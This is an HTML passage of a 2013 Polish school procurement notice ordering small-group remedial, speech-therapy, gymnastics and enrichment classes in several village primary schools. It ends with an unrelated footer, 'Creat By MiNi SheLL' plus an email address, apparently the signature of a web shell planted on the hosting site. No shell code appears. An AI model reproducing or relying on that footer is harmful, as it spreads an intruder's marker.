<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Ryszkowej Woli o następującym zakresie:
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Ryszkowej Woli o następującym zakresie:
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w łącznym 
wymiarze w ilości 60 godz.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 6 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Ryszkowej Woli o następującym zakresie:
Gimnastyka korekcyjna dla dzieci z wadami postawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Ryszkowej Woli o następującym zakresie:
Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze w ilości 30 godz.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 3 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Ryszkowej Woli o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
uwzględnieniem  nauk matematyczno - przyrodniczych, np. prowadzenie obserwacji   
przyrodniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Ryszkowej Woli o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
uwzględnieniem  nauk matematyczno - przyrodniczych, np. prowadzenie obserwacji   
przyrodniczych w  łącznym wymiarze  w ilości 30 godzin.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 4 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Ryszkowej Woli o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
uwzględnieniem  umiejętności artystycznych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Ryszkowej Woli o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
uwzględnieniem  umiejętności artystycznych, w  łącznym wymiarze w ilości 30 godzin.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 5 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Zapałowie o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Zapałowie o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji w łącznym  wymiarze w ilości 90 godz. ( 3 grupy)    
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 22 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Zapałowie o następującym zakresie:
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Zapałowie o następującym zakresie:
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w łącznym 
wymiarze  w ilości 60 godz. ( 2 grupy)
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 9 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Zapałowie o następującym zakresie:
Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Zapałowie o następującym zakresie:
Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy  ( 2 grupy) w łącznym  
wymiarze w ilości 60 godz. ( 2x30 godz.)
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 9 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Zapałowie o następującym zakresie:
Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji 
społecznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Zapałowie o następującym zakresie:
Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji 
społecznej w łącznym  wymiarze w ilości 30 godz.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 4 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Zapałowie o następującym zakresie:
Gimnastyka korekcyjna dla dzieci z wadami postawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Zapałowie o następującym zakresie:
Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze w ilości 30 godz.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 10 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Zapałowie o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
uwzględnieniem  umiejętności plastycznych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Zapałowie o następującym zakresie:
Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym 
uwzględnieniem  umiejętności plastycznych, w  łącznym wymiarze w ilości 30 godzin.
Termin realizacji  do dnia 30.06.2013 r.  
Łączna liczba uczniów objęta zajęciami - 5 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Manasterzu o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  
W szkole podstawowej w Manasterzu o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji w łącznym  wymiarze w ilości 32 godz. 
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 6 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Manasterzu o następującym zakresie:
Gimnastyka korekcyjna dla dzieci z wadami postawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Manasterzu o następującym zakresie:
Gimnastyka korekcyjna dla dzieci z wadami postawy w łącznym wymiarze w ilości 32 godz.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 6 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Mołodyczu o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Mołodyczu o następującym zakresie:
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także 
zagrożonym ryzykiem dysleksji w łącznym  wymiarze w ilości 200 godz. 
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 14 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> 31 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Mołodyczu o następującym zakresie:
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 31 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III  W szkole podstawowej w Mołodyczu o następującym zakresie:
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  w łącznym  
wymiarze w ilości 120 godz.
Termin realizacji  do dnia 30.06.2013 r. 
Łączna liczba uczniów objęta zajęciami - 9 uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Doposażenie sal dydaktycznych w pomoce dydaktyczne na doposażenie sal dydaktycznych szkół  niezbędnych do prawidłowego prowadzenia zajęć przewidzianych  w ramach projektu,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Doposażenie sal dydaktycznych w pomoce dydaktyczne na doposażenie sal dydaktycznych szkół  niezbędnych do prawidłowego prowadzenia zajęć przewidzianych  w ramach projektu, wg. zestawienia stanowiącego zał. do siwz.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com